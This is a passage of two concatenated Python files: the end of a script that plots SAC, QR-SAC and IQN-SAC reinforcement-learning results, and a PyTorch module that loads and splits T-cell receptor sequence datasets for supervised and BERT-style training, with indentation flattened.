"Walker2DBulletEnv-v0": [
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_1_20210913162159/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_2_20210913211400/evaluation.csv",
"extra/multistep/SAC_online_n_1_Walker2DBulletEnv-v0_3_20210914015659/evaluation.csv",
]
}
QR_SAC = {
"Hopper-v2": [
"extra/dist/SAC_online_qr_Hopper-v2_1_20210909011159/evaluation.csv",
"extra/dist/SAC_online_qr_Hopper-v2_2_20210909033231/evaluation.csv",
"extra/dist/SAC_online_qr_Hopper-v2_3_20210909055317/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/dist/SAC_online_qr_HalfCheetah-v2_1_20210908180856/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetah-v2_2_20210908202936/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetah-v2_3_20210908225154/evaluation.csv",
],
"Walker2d-v2": [
"extra/dist/SAC_online_qr_Walker2d-v2_1_20210908110605/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2d-v2_2_20210908132528/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2d-v2_3_20210908154657/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_1_20210913032234/evaluation.csv",
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_2_20210913055127/evaluation.csv",
"extra/dist/SAC_online_qr_HopperBulletEnv-v0_3_20210913081937/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_1_20210912193246/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_2_20210912220918/evaluation.csv",
"extra/dist/SAC_online_qr_HalfCheetahBulletEnv-v0_3_20210913004612/evaluation.csv",
],
"Walker2DBulletEnv-v0": [
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_1_20210912115500/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_2_20210912142816/evaluation.csv",
"extra/dist/SAC_online_qr_Walker2DBulletEnv-v0_3_20210912165944/evaluation.csv",
]
}
IQN_SAC = {
"Hopper-v2": [
"extra/dist/SAC_online_iqn_Hopper-v2_1_20210908233348/evaluation.csv",
"extra/dist/SAC_online_iqn_Hopper-v2_2_20210909052157/evaluation.csv",
"extra/dist/SAC_online_iqn_Hopper-v2_3_20210909112027/evaluation.csv",
],
"HalfCheetah-v2": [
"extra/dist/SAC_online_iqn_HalfCheetah-v2_1_20210909171057/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetah-v2_2_20210909231110/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetah-v2_3_20210910050232/evaluation.csv",
],
"Walker2d-v2": [
"extra/dist/SAC_online_iqn_Walker2d-v2_1_20210908233406/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2d-v2_2_20210909051902/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2d-v2_3_20210909111702/evaluation.csv",
],
"HopperBulletEnv-v0": [
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_1_20210913030912/evaluation.csv",
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_2_20210913080425/evaluation.csv",
"extra/dist/SAC_online_iqn_HopperBulletEnv-v0_3_20210913130150/evaluation.csv",
],
"HalfCheetahBulletEnv-v0": [
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_1_20210912115226/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_2_20210912170009/evaluation.csv",
"extra/dist/SAC_online_iqn_HalfCheetahBulletEnv-v0_3_20210912220503/evaluation.csv",
],
"Walker2DBulletEnv-v0": [
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_1_20210913175909/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_2_20210913230802/evaluation.csv",
"extra/dist/SAC_online_iqn_Walker2DBulletEnv-v0_3_20210914041137/evaluation.csv",
]
}
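# Each evaluation.csv is assumed to hold (epoch, step, score) rows; column 1 (step)
# is plotted on x and column 2 (score) on y, aggregated across seeds by seaborn.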
def plot(score_list, label):
data = []
for path in score_list:
data.append(np.loadtxt(path, delimiter=","))
x = np.transpose(np.array(data), [2, 1, 0])[1, :, :]
y = np.transpose(np.array(data), [2, 1, 0])[2, :, :]
sns.lineplot(x=x.reshape(-1), y=y.reshape(-1), label=label)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env', type=str)
parser.add_argument('--save', type=str)
args = parser.parse_args()
plot(SAC[args.env], "SAC")
plot(QR_SAC[args.env], "QR-SAC")
plot(IQN_SAC[args.env], "IQN-SAC")
plt.title(args.env)
plt.xlabel("million step")
plt.xticks([0, 200000, 400000, 600000, 800000, 1000000],
["0", "0.2", "0.4", "0.6", "0.8", "1.0"])
plt.xlim(0, 1000000)
plt.ylabel("average return")
plt.legend()
if args.save:
plt.savefig(args.save)
else:
plt.show()
if __name__ == "__main__":
main()
|
py | b40437aeeabf1479bbb202d9ea86ccdb00190072 | """
Code for loading data
"""
import os, sys
import shutil
import argparse
import functools
import multiprocessing
import gzip
import inspect
import glob
import json
import itertools
import collections
import logging
from typing import *
import torch
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
import Levenshtein
import featurization as ft
import utils
LOCAL_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "data")
assert os.path.isdir(LOCAL_DATA_DIR)
EXTERNAL_EVAL_DIR = os.path.join(os.path.dirname(LOCAL_DATA_DIR), "external_eval")
assert os.path.isdir(EXTERNAL_EVAL_DIR)
# Names of datasets
DATASET_NAMES = {"LCMV", "VDJdb", "PIRD", "TCRdb"}
logging.basicConfig(level=logging.INFO)
class TcrABSupervisedIdxDataset(Dataset):
"""Dataset that returns TcrAB and label"""
def __init__(
self,
tcr_table: pd.DataFrame,
label_col: str = "tetramer",
pos_labels: Collection[str] = ["TetMid", "TetPos"],
idx_encode: bool = False,
max_a_len: Optional[int] = None,
max_b_len: Optional[int] = None,
disambiguate_labels: bool = True,
):
self.table = tcr_table
self.label_col = label_col
if disambiguate_labels:
logging.info("Deduping and removing examples with conflicting labels")
lcmv_dedup_ab, self.labels = dedup_lcmv_table(tcr_table)
self.tras, self.trbs = zip(*lcmv_dedup_ab)
else:
raise NotImplementedError(
"Running withough disambiguating labels causes duplicated and conflicting labels! This was the prior behavior, but is now deprecated"
)
tcr_a_lengths = [len(self.get_ith_tcr_a(i)) for i in range(len(self))]
tcr_b_lengths = [len(self.get_ith_tcr_b(i)) for i in range(len(self))]
self.max_a_len = max(tcr_a_lengths) if max_a_len is None else max_a_len
self.max_b_len = max(tcr_b_lengths) if max_b_len is None else max_b_len
self.idx_encode = idx_encode
logging.info(f"Maximum TCR A/B lengths: {self.max_a_len} {self.max_b_len}")
self.pos_labels = pos_labels
logging.info(f"Positive {label_col} labels: {pos_labels}")
def __len__(self) -> int:
return len(self.labels)
def get_ith_tcr_a(self, idx: int, pad: bool = False) -> str:
"""Gets the ith TRA sequence"""
seq = self.tras[idx]
if pad:
seq = ft.pad_or_trunc_sequence(seq, self.max_a_len, right_align=False)
return seq
def get_ith_tcr_b(self, idx: int, pad: bool = False) -> str:
"""Gets the ith TRB sequence"""
seq = self.trbs[idx]
if pad:
seq = ft.pad_or_trunc_sequence(seq, self.max_b_len, right_align=False)
return seq
def get_ith_sequence(self, idx: int) -> Tuple[str, str]:
"""Get the ith TRA/TRB pair"""
return self.tras[idx], self.trbs[idx]
def get_ith_label(self, idx: int, idx_encode: Optional[bool] = None) -> np.ndarray:
"""Get the ith label"""
label = self.labels[idx]
retval = float(np.any([l in label for l in self.pos_labels]))
retval = np.array([1.0 - retval, retval], dtype=np.float32)
idx_encode = self.idx_encode if idx_encode is None else idx_encode
if idx_encode:
retval = np.where(retval)[0]
return retval
def __getitem__(self, idx: int):
tcr_a_idx = ft.idx_encode(self.get_ith_tcr_a(idx, pad=True))
tcr_b_idx = ft.idx_encode(self.get_ith_tcr_b(idx, pad=True))
label = self.get_ith_label(idx)
return (
{
"tcr_a": torch.from_numpy(tcr_a_idx),
"tcr_b": torch.from_numpy(tcr_b_idx),
},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TcrABSupervisedOneHotDataset(TcrABSupervisedIdxDataset):
"""Dataset that encodes tcrAB as one hot encoded vectors"""
def __getitem__(self, idx: int):
tcr_a_idx = ft.one_hot(self.get_ith_tcr_a(idx, pad=True))
tcr_b_idx = ft.one_hot(self.get_ith_tcr_b(idx, pad=True))
label = self.get_ith_label(idx)
return (
{
"tcr_a": torch.from_numpy(tcr_a_idx),
"tcr_b": torch.from_numpy(tcr_b_idx),
},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TCRSupervisedIdxDataset(Dataset):
"""Dataset meant for either TRA or TRB supervised learning"""
def __init__(
self,
tcrs: Sequence[str],
labels: Sequence[bool],
idx_encode_labels: bool = True,
max_len: Optional[int] = None,
):
self.tcrs = tcrs
self.labels = labels
assert len(self.tcrs) == len(self.labels)
self.max_len = max_len # Defaults to None
determined_max_len = max([len(t) for t in tcrs])
if self.max_len is not None:
# If a max_len is explicitly given, check that it is greater than the actual max len
assert isinstance(self.max_len, int)
assert determined_max_len <= self.max_len
logging.info(
f"Given max_len of {self.max_len} exceeds (as expected) empirical max_len of {determined_max_len}"
)
else:
# If max_len is not given, directly set the max_len
logging.info(
f"Max len not set, using empirical max len of {determined_max_len}"
)
self.max_len = determined_max_len
logging.info(f"Using maximum length of {self.max_len}")
self.idx_encode_labels = idx_encode_labels
def all_labels(self) -> Sequence[bool]:
"""Return all labels"""
return self.labels
def __len__(self) -> int:
return len(self.tcrs)
def get_ith_tcr(self, idx: int, pad: bool = True) -> str:
"""Returns the ith tcr sequence, padded with null residues"""
retval = self.tcrs[idx]
if pad:
retval = ft.pad_or_trunc_sequence(retval, self.max_len, right_align=False)
return retval
def get_ith_sequence(self, idx: int) -> str:
return self.tcrs[idx]
def get_ith_label(self, idx: int) -> np.ndarray:
retval = float(self.labels[idx])
if not self.idx_encode_labels:
retval = np.array([1.0 - retval, retval], dtype=np.float32)
return np.atleast_1d(retval)
def __getitem__(self, idx: int) -> Tuple[Dict[str, torch.Tensor], torch.Tensor]:
tcr_idx = ft.idx_encode(self.get_ith_tcr(idx, pad=True))
label = self.get_ith_label(idx)
return (
{"seq": torch.from_numpy(tcr_idx)},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TcrSelfSupervisedDataset(TcrABSupervisedIdxDataset):
"""
Mostly for compatibility with transformers library
LineByLineTextDataset returns a dict of "input_ids" -> input_ids
"""
# Reference: https://github.com/huggingface/transformers/blob/447808c85f0e6d6b0aeeb07214942bf1e578f9d2/src/transformers/data/datasets/language_modeling.py
def __init__(self, tcr_seqs: Iterable[str], tokenizer, round_len: bool = True):
self.tcr_seqs = utils.dedup(tcr_seqs)
logging.info(
f"Creating self supervised dataset with {len(self.tcr_seqs)} sequences"
)
self.max_len = max([len(s) for s in self.tcr_seqs])
logging.info(f"Maximum sequence length: {self.max_len}")
if round_len:
self.max_len = int(utils.min_power_greater_than(self.max_len, 2))
logging.info(f"Rounded maximum length to {self.max_len}")
self.tokenizer = tokenizer
self._has_logged_example = False
def __len__(self) -> int:
return len(self.tcr_seqs)
def __getitem__(self, i: int) -> Dict[str, torch.Tensor]:
tcr = self.tcr_seqs[i]
retval = self.tokenizer.encode(ft.insert_whitespace(tcr))
if not self._has_logged_example:
logging.info(f"Example of tokenized input: {tcr} -> {retval}")
self._has_logged_example = True
return {"input_ids": torch.tensor(retval, dtype=torch.long)}
def merge(self, other):
"""Merge this dataset with the other dataset"""
all_tcrs = utils.dedup(self.tcr_seqs + other.tcr_seqs)
logging.info(
f"Merged two self-supervised datasets of sizes {len(self)} {len(other)} for dataset of {len(all_tcrs)}"
)
        return TcrSelfSupervisedDataset(all_tcrs, self.tokenizer)
class TcrNextSentenceDataset(Dataset):
"""
Dataset for next sentence prediction. Input is two lists of pairwise
corresponding TRA TRB sequences
Note that the labelling scheme here is (False, True)
This DIFFERS from the convention used in the transformers library for NSP
    Note that the TRA/TRB naming convention is somewhat of a misnomer - in reality, these are
just first/second pairs.
This also supports generating NEGATIVE examples dynamically. This is automatically
enabled when this is wrapped in a DatasetSplit object with training split. This
may yield improved sampling of the negative manifold and yield a more general model
"""
def __init__(
self,
tra_seqs: List[str],
trb_seqs: List[str],
neg_ratio: float = 1.0,
labels: Optional[Iterable[bool]] = None,
tra_blacklist: Optional[Iterable[str]] = None,
mlm: float = 0.0,
max_len: int = 64,
seed: int = 4242,
remove_null: bool = True,
shuffle: bool = True,
):
assert len(tra_seqs) == len(trb_seqs)
# Remove cases of nan
logging.info(f"Build NSP dataset with {len(tra_seqs)} pairs")
if remove_null:
bad_idx_a = [
i
for i, seq in enumerate(tra_seqs)
if seq is None or pd.isnull(seq) or seq == ""
]
bad_idx_b = [
i
for i, seq in enumerate(trb_seqs)
if seq is None or pd.isnull(seq) or seq == ""
]
bad_idx = set(bad_idx_a).union(bad_idx_b)
logging.info(
f"Removing {len(bad_idx)} bad pairs: {len(bad_idx_a)} union {len(bad_idx_b)}"
)
tra_seqs = [a for i, a in enumerate(tra_seqs) if i not in bad_idx]
trb_seqs = [a for i, a in enumerate(trb_seqs) if i not in bad_idx]
if tra_blacklist is not None:
bad_idx = [i for i, seq in enumerate(tra_seqs) if seq in set(tra_blacklist)]
logging.info(f"Removing {len(bad_idx)} blacklisted items")
tra_seqs = [a for i, a in enumerate(tra_seqs) if i not in bad_idx]
trb_seqs = [a for i, a in enumerate(trb_seqs) if i not in bad_idx]
logging.info(f"Building NSP datset with {len(tra_seqs)} pairs after filtering")
# Insert whitespace as we store the sequences
# Whitespace separated inputs is expected by tokenizer
# These are never shuffled, regardless of the shuffle param
self.tra = [ft.insert_whitespace(aa) for aa in tra_seqs]
self.trb = [ft.insert_whitespace(aa) for aa in trb_seqs]
assert 0.0 <= mlm <= 1.0
self.mlm = mlm
self.neg_ratio = neg_ratio
self.rng = np.random.default_rng(seed=seed)
if self.neg_ratio > 0:
assert labels is None, "Cannot sample negatives if labels are given"
pos_pairs = list(zip(self.tra, self.trb))
num_negs = int(round(len(pos_pairs) * neg_ratio))
logging.info(f"Sampling {num_negs} negatives")
neg_pairs = [self.__sample_negative() for _i in range(num_negs)]
logging.info(f"Positive pairs: {len(pos_pairs)}")
logging.info(f"Sampled negative pairs: {len(neg_pairs)}")
# WARNING in tokenizers convention, output is (True, False)
# This means that a correct pair is a "0" and a wrong pair is a "1"
# we DO NOT adhere to this convention, rather using a conventional labelling
self.labels = np.array([1] * len(pos_pairs) + [0] * len(neg_pairs))
self.all_pairs = pos_pairs + neg_pairs
elif labels is not None:
logging.info(f"Taking given labels with {np.mean(labels)} positive rate")
self.labels = labels
self.all_pairs = list(zip(self.tra, self.trb))
else:
# raise RuntimeError("Must provide either neg_ratio or labels argument")
            logging.warning(
"No labels or negative ratio provided, defaulting to all negative labels"
)
self.all_pairs = list(zip(self.tra, self.trb))
self.labels = np.array([0.0] * len(self.all_pairs))
assert len(self.labels) == len(self.all_pairs)
self.max_len = max_len
max_len_actual = max(
max([len(aa.split()) for aa in self.tra]),
max([len(aa.split()) for aa in self.trb]),
)
logging.info(f"Maximum length of NSP single sequence: {max_len_actual}")
self.tok = ft.get_aa_bert_tokenizer(max_len=max_len_actual)
# Shuffle the examples
if shuffle:
logging.info("Shuffling NSP dataset")
shuf_idx = np.arange(len(self.labels))
self.rng.shuffle(shuf_idx)
self.labels = self.labels[shuf_idx] # Contains whether this is a valid pair
self.all_pairs = [self.all_pairs[i] for i in shuf_idx]
logging.info(
f"NSP dataset of {len(self.all_pairs)} pairs, {np.sum(self.labels)} positive examples"
)
logging.info(f"Example training example")
for k, v in self[0].items():
logging.info(f"{k}: {v}")
def __sample_negative(self) -> Tuple[str, str]:
"""
Generate a negative example
"""
if self.neg_ratio <= 0.0:
raise RuntimeError("Cannot sample negatives for labelled dataset")
i, j = self.rng.integers(len(self.tra), size=2)
while self.tra[i] == self.tra[j]: # Is not a valid pair
j = self.rng.integers(len(self.tra))
return self.tra[i], self.trb[j]
def __len__(self) -> int:
assert len(self.labels) == len(self.all_pairs)
return len(self.labels)
def get_ith_label(self, idx):
return self.labels[idx]
def get_ith_sequence(self, idx) -> Tuple[str, str]:
return self.all_pairs[idx]
def __getitem__(self, idx: int, dynamic: bool = False) -> Dict[str, torch.Tensor]:
"""
dynamic is a general flag for generating examples dynamically
"""
label = self.labels[idx]
label_tensor = torch.LongTensor(np.atleast_1d(label))
if dynamic and label == 0:
# Dynamically generate a negative example
pair = self.__sample_negative()
else: # Positive example OR not dynamic
pair = self.all_pairs[idx]
if self.mlm > 0.0:
# Mask out each sequence BEFORE we pad/concatenate them
# This ensures that the mask is always an amino acid
mlm_targets, pair = zip(*[ft.mask_for_training(a) for a in pair])
t = np.atleast_1d(-100).astype(np.int64)
# CLS seq1 SEP seq2 SEP
mlm_targets_combined = np.concatenate(
[t, mlm_targets[0], t, mlm_targets[1], t]
)
mlm_targets_padded = torch.LongTensor(
np.pad(
mlm_targets_combined,
(0, self.max_len - len(mlm_targets_combined)),
mode="constant",
constant_values=-100,
)
)
enc = self.tok(
text=pair[0],
text_pair=pair[1],
padding="max_length",
max_length=self.max_len,
return_tensors="pt",
)
# Default tokenization has (batch, ...) as first dim
# Since __getitem__ only gets a single example, remove this
enc = {k: v.squeeze() for k, v in enc.items()}
if self.mlm > 0.0: # NSP + MLM
assert (
mlm_targets_padded.size() == enc["input_ids"].size()
), f"Mismatched sizes {mlm_targets_padded.size()} {enc['input_ids'].size()}"
enc["next_sentence_label"] = label_tensor
enc["labels"] = torch.LongTensor(mlm_targets_padded)
else: # NSP only
enc["labels"] = label_tensor
return enc
def get_all_items(self) -> Dict[str, torch.Tensor]:
"""
Get all the data instead of individual entries
"""
collector = collections.defaultdict(list)
for i in range(len(self)):
x = self[i]
for k, v in x.items():
collector[k].append(v.reshape(1, -1))
retval = {k: torch.cat(v, dim=0) for k, v in collector.items()}
return retval
class TcrFineTuneSingleDataset(TcrSelfSupervisedDataset):
"""Dataset for fine tuning from only TRA or TRB sequences"""
def __init__(
self,
aa: Sequence[str],
labels: MutableSequence[float],
label_continuous: bool = False,
label_labels: Optional[Sequence[str]] = None,
drop_rare_labels: bool = True,
):
assert len(aa) == len(
labels
), f"Got differing lengths for aa and labels: {len(aa)}, {len(labels)}"
self.aa = [ft.insert_whitespace(item) for item in aa]
self.tokenizer = ft.get_aa_bert_tokenizer(64)
self.continuous = label_continuous
label_dtype = np.float32 if self.continuous else np.int64
self.labels = np.array(labels, dtype=label_dtype).squeeze()
assert len(self.labels) == len(self.aa)
self.label_labels = label_labels
if self.continuous:
assert self.label_labels is None
if drop_rare_labels and not self.continuous and not self.is_multilabel:
# Get the mean positive rate for each label
labels_expanded = np.zeros((len(labels), np.max(labels) + 1))
labels_expanded[np.arange(len(labels)), self.labels] = 1
per_label_prop = np.mean(labels_expanded, axis=0)
# Find the labels with high enough positive rate
good_idx = np.where(per_label_prop >= 1e-3)[0]
if len(good_idx) < labels_expanded.shape[1]:
logging.info(
f"Retaining {len(good_idx)}/{labels_expanded.shape[1]} labels with sufficient examples"
)
# Reconstruct labels based only on retained good_idx
# nonzero returns indices of element that are nonzero
self.labels = np.array(
[
np.nonzero(good_idx == label)[0][0]
if label in good_idx
else len(good_idx) # "other" labels
for label in self.labels
],
dtype=label_dtype,
)
assert np.max(self.labels) == len(good_idx)
# Subset label labels
self.label_labels = [self.label_labels[i] for i in good_idx] + ["other"]
assert len(self.label_labels) == len(good_idx) + 1
@property
def is_multilabel(self) -> bool:
"""Return True if labels represent multilabel classification"""
return len(self.labels.shape) > 1
def get_ith_sequence(self, idx: int) -> str:
"""Get the ith sequence"""
return self.aa[idx]
def get_ith_label(self, idx: int) -> np.ndarray:
"""Gets the ith label"""
return np.atleast_1d(self.labels[idx])
def __len__(self) -> int:
return len(self.labels)
def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:
label = torch.tensor(self.get_ith_label(idx))
if self.is_multilabel:
# Multilabel -> BCEWithLogitsLoss which wants float target
label = label.float()
# We already inserted whitespaces in init
enc = self.tokenizer(
self.aa[idx], padding="max_length", max_length=64, return_tensors="pt"
)
enc = {k: v.squeeze() for k, v in enc.items()}
enc["labels"] = label
return enc
class TcrFineTuneDataset(TcrSelfSupervisedDataset):
"""Can supply tokenizer to work with ESM"""
def __init__(
self,
tcr_a_seqs: Sequence[str],
tcr_b_seqs: Sequence[str],
labels: Optional[np.ndarray] = None,
label_continuous: bool = False,
tokenizer: Optional[Callable] = None,
skorch_mode: bool = True,
idx_encode: bool = False,
):
assert len(tcr_a_seqs) == len(tcr_b_seqs)
self.tcr_a = list(tcr_a_seqs)
self.tcr_b = list(tcr_b_seqs)
self.max_len = max([len(s) for s in self.tcr_a + self.tcr_b]) + 2
if tokenizer is None:
tokenizer = ft.get_aa_bert_tokenizer(self.max_len)
self.tcr_a_tokenized = [
tokenizer.encode(
ft.insert_whitespace(aa),
padding="max_length",
max_length=self.max_len,
)
for aa in self.tcr_a
]
self.tcr_b_tokenized = [
tokenizer.encode(
ft.insert_whitespace(aa),
padding="max_length",
max_length=self.max_len,
)
for aa in self.tcr_b
]
else:
logging.info(f"Using pre-supplied tokenizer: {tokenizer}")
_label, _seq, self.tcr_a_tokenized = tokenizer(list(enumerate(self.tcr_a)))
_label, _seq, self.tcr_b_tokenized = tokenizer(list(enumerate(self.tcr_b)))
if labels is not None:
assert len(labels) == len(tcr_a_seqs)
self.labels = np.atleast_1d(labels.squeeze())
else:
logging.warning(
"Labels not given, defaulting to False labels (DO NOT USE FOR TRAINING)"
)
self.labels = None
self.continuous = label_continuous
self.skorch_mode = skorch_mode
self.idx_encode = idx_encode
def get_ith_sequence(self, idx: int) -> Tuple[str, str]:
"""Get the ith TRA/TRB pair"""
return self.tcr_a[idx], self.tcr_b[idx]
def get_ith_label(self, idx: int, idx_encode: Optional[bool] = None) -> np.ndarray:
"""Get the ith label"""
if self.labels is None:
return np.array([0]) # Dummy value
if not self.continuous:
label = self.labels[idx]
if not isinstance(label, np.ndarray):
label = np.atleast_1d(label)
if self.skorch_mode and len(label) == 1:
label = np.array([1.0 - label, label]).squeeze()
# Take given value if supplied, else default to self.idx_encode
idx_encode = self.idx_encode if idx_encode is None else idx_encode
if idx_encode:
label = np.where(label)[0]
return label
else:
# For the continuous case we simply return the ith value(s)
return self.labels[idx]
def __len__(self) -> int:
return len(self.tcr_a)
def __getitem__(
self, idx: int
) -> Union[Dict[str, torch.Tensor], Tuple[Dict[str, torch.Tensor], torch.Tensor]]:
label_dtype = torch.float if self.continuous else torch.long
tcr_a = self.tcr_a_tokenized[idx]
tcr_b = self.tcr_b_tokenized[idx]
label = self.get_ith_label(idx)
if not self.skorch_mode:
retval = {
"tcr_a": utils.ensure_tensor(tcr_a, dtype=torch.long),
"tcr_b": utils.ensure_tensor(tcr_b, dtype=torch.long),
"labels": utils.ensure_tensor(label, dtype=label_dtype),
}
else:
model_inputs = {
"tcr_a": utils.ensure_tensor(tcr_a, dtype=torch.long),
"tcr_b": utils.ensure_tensor(tcr_b, dtype=torch.long),
}
retval = (model_inputs, torch.tensor(label, dtype=label_dtype).squeeze())
return retval
class DatasetSplit(Dataset):
"""
    Dataset split. Thin wrapper on top of a dataset to provide data split functionality.
Can also enable dynamic example generation for train fold if supported by
the wrapped dataset (NOT for valid/test folds) via dynamic_training flag
kwargs are forwarded to shuffle_indices_train_valid_test
"""
def __init__(
self,
full_dataset: Dataset,
split: str,
dynamic_training: bool = False,
**kwargs,
):
self.dset = full_dataset
split_to_idx = {"train": 0, "valid": 1, "test": 2}
assert split in split_to_idx
self.split = split
self.dynamic = dynamic_training
if self.split != "train":
assert not self.dynamic, "Cannot have dynamic examples for valid/test"
self.idx = shuffle_indices_train_valid_test(
np.arange(len(self.dset)), **kwargs
)[split_to_idx[self.split]]
logging.info(f"Split {self.split} with {len(self)} examples")
def all_labels(self, **kwargs) -> np.ndarray:
"""Get all labels"""
if not hasattr(self.dset, "get_ith_label"):
raise NotImplementedError("Wrapped dataset must implement get_ith_label")
labels = [
self.dset.get_ith_label(self.idx[i], **kwargs) for i in range(len(self))
]
return np.stack(labels)
def all_sequences(self, **kwargs) -> Union[List[str], List[Tuple[str, str]]]:
"""Get all sequences"""
if not hasattr(self.dset, "get_ith_sequence"):
raise NotImplementedError(
f"Wrapped dataset {type(self.dset)} must implement get_ith_sequence"
)
# get_ith_sequence could return a str or a tuple of two str (TRA/TRB)
sequences = [
self.dset.get_ith_sequence(self.idx[i], **kwargs) for i in range(len(self))
]
return sequences
def to_file(self, fname: str, compress: bool = True) -> str:
"""
Write to the given file
"""
if not (
hasattr(self.dset, "get_ith_label")
and hasattr(self.dset, "get_ith_sequence")
):
raise NotImplementedError(
"Wrapped dataset must implement both get_ith_label & get_ith_sequence"
)
assert fname.endswith(".json")
all_examples = []
for idx in range(len(self)):
seq = self.dset.get_ith_sequence(self.idx[idx])
label_list = self.dset.get_ith_label(self.idx[idx]).tolist()
all_examples.append((seq, label_list))
with open(fname, "w") as sink:
json.dump(all_examples, sink, indent=4)
if compress:
with open(fname, "rb") as source:
with gzip.open(fname + ".gz", "wb") as sink:
shutil.copyfileobj(source, sink)
os.remove(fname)
fname += ".gz"
assert os.path.isfile(fname)
return os.path.abspath(fname)
def __len__(self) -> int:
return len(self.idx)
def __getitem__(self, idx: int):
if (
self.dynamic
and self.split == "train"
and "dynamic" in inspect.getfullargspec(self.dset.__getitem__).args
):
return self.dset.__getitem__(self.idx[idx], dynamic=True)
return self.dset.__getitem__(self.idx[idx])
class DatasetSplitByAttribute(DatasetSplit):
"""
    Dataset split. Thin wrapper on top of a dataset to provide data split functionality.
Unlike the above, which is a purely random split, this splits by a given attribute.
attr_getter function should take the dataset and return a list of attrs to split by
"""
def __init__(
self,
        full_dataset: Dataset,
attr_getter: Callable,
split: str,
dynamic_training: bool = False,
valid: float = 0.15,
test: float = 0.15,
seed: int = 1234,
):
        self.dset = full_dataset
self.dynamic = dynamic_training
self.split = split
self.split_attr = attr_getter(self.dset)
assert len(self.split_attr) == len(self.dset)
# Get the unique attrs and count occurrences of each
split_attr_counts = collections.Counter(self.split_attr)
assert (
len(split_attr_counts) >= 2
), f"Must have at least two classes of attribute to split, but got {len(split_attr_counts)}"
# Sort the attrs by most counts to least
_, self.train_attrs = zip(
*sorted(
[(count, attr) for attr, count in split_attr_counts.items()],
reverse=True,
)
)
self.train_attrs = list(self.train_attrs)
# Build valid, then test sets, by greedily taking the largest groups
# until we have at least the required number of examples
valid_n, test_n = len(self.dset) * valid, len(self.dset) * test
self.valid_attrs, self.test_attrs = [], []
while sum([split_attr_counts[a] for a in self.valid_attrs]) < valid_n:
# Take the biggest item in the list
self.valid_attrs.append(self.train_attrs.pop(0))
while sum([split_attr_counts[a] for a in self.test_attrs]) < test_n:
# Take the biggest item in the list
self.test_attrs.append(self.train_attrs.pop(0))
train_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.train_attrs)
]
)
valid_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.valid_attrs)
]
)
test_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.test_attrs)
]
)
assert len(train_idx) + len(valid_idx) + len(test_idx) == len(self.dset)
logging.info(
f"Train split with {len(train_idx)} examples across {len(self.train_attrs)} attrs"
)
logging.info(
f"Valid split with {len(valid_idx)} examples across {len(self.valid_attrs)} attrs"
)
logging.info(
f"Test split with {len(test_idx)} examples across {len(self.test_attrs)} attrs"
)
rng = np.random.default_rng(seed)
rng.shuffle(train_idx)
rng.shuffle(valid_idx)
rng.shuffle(test_idx)
self.idx = {"train": train_idx, "valid": valid_idx, "test": test_idx}[split]
class DownsampledDataset(Dataset):
"""
Downsampled and shuffled dataset. Useful for evaluating impact of having less data.
Downsampling is done to a *fixed* subset of the original dataset
"""
def __init__(self, dset: Dataset, downsample: float = 0.1, seed: int = 3939):
assert 0.0 < downsample < 1.0
self.dset = dset
self.downsample = downsample
self.idx = np.arange(len(self.dset))
np.random.seed(seed)
np.random.shuffle(self.idx)
self.idx = self.idx[: int(np.round(downsample * len(self.dset)))]
logging.info(f"Downsampled from {len(self.dset)} -> {len(self)} samples")
def __len__(self) -> int:
return len(self.idx)
def __getitem__(self, idx: int):
return self.dset[self.idx[idx]]
def shuffle_indices_train_valid_test(
idx: np.ndarray, valid: float = 0.15, test: float = 0.15, seed: int = 1234
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Given an array of indices, return indices partitioned into train, valid, and test indices
The following tests ensure that ordering is consistent across different calls
>>> np.all(shuffle_indices_train_valid_test(np.arange(100))[0] == shuffle_indices_train_valid_test(np.arange(100))[0])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(10000))[1] == shuffle_indices_train_valid_test(np.arange(10000))[1])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(20000))[2] == shuffle_indices_train_valid_test(np.arange(20000))[2])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(1000), 0.1, 0.1)[1] == shuffle_indices_train_valid_test(np.arange(1000), 0.1, 0.1)[1])
True
"""
np.random.seed(seed) # For reproducible subsampling
indices = np.copy(idx) # Make a copy because shuffling occurs in place
np.random.shuffle(indices) # Shuffles inplace
num_valid = int(round(len(indices) * valid)) if valid > 0 else 0
num_test = int(round(len(indices) * test)) if test > 0 else 0
num_train = len(indices) - num_valid - num_test
assert num_train > 0 and num_valid >= 0 and num_test >= 0
